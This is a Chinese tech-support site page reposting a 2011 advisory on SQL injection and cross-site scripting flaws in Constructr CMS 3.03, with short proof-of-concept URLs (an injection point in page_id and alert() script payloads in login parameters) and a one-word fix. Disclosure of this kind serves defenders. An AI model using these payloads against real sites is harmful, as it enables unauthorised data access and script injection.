客服中心
业务咨询
技术支持
在线客服
Constructr CMS XSS/SQL注入漏洞及修复
添加时间:2011-3-12
添加:
admin
Constructr是一款内容管理系统,Constructr中存在SQL注入和XSS漏洞,可能导致敏感信息泄露。
[+]info:
~~~~~~~~~
Constructr CMS 3.03 Miltiple Remote Vulnerabilities (XSS/SQLi)
Vendor: phaziz interface design
Product web page: http://www.constructr-cms.org
Affected version: 3.03.0
[+]poc:
~~~~~~~~~
[SQL] http://constructr/xmlOutput/constructrXmlOutput.content.xml.php?
page_id='[INJECT POINT];--";--
[XSS] http://constructr/backend/login.php?installed=101&no_user_rights=101&login_first_echo=101&already_logged_in=
101&login_user_deactivated=101&login_failed=101&login_success=101&nosaltnpepper=
101&user=101<>alert(2)</>&hash=101<>alert(2)</>
修复:过滤
关健词:XSS/SQL
新文章:
- CentOS7下图形配置网络的方法
- CentOS 7如何添加删除用户
- 如何解决centos7双系统后丢失windows启动项
- CentOS单网卡如何批量添加不同IP段
- CentOS下iconv命令的介绍
- Centos7 SSH密钥登陆及密码密钥双重验证详解
- CentOS 7.1添加删除用户的方法
- CentOS查找/扫描局域网打印机IP讲解
- CentOS7使用hostapd实现无AP模式的详解
- su命令不能切换root的解决方法
- 解决VMware下CentOS7网络重启出错
- 解决Centos7双系统后丢失windows启动项
- CentOS下如何避免文件覆盖
- CentOS7和CentOS6系统有什么不同呢
- Centos 6.6默认iptable规则详解
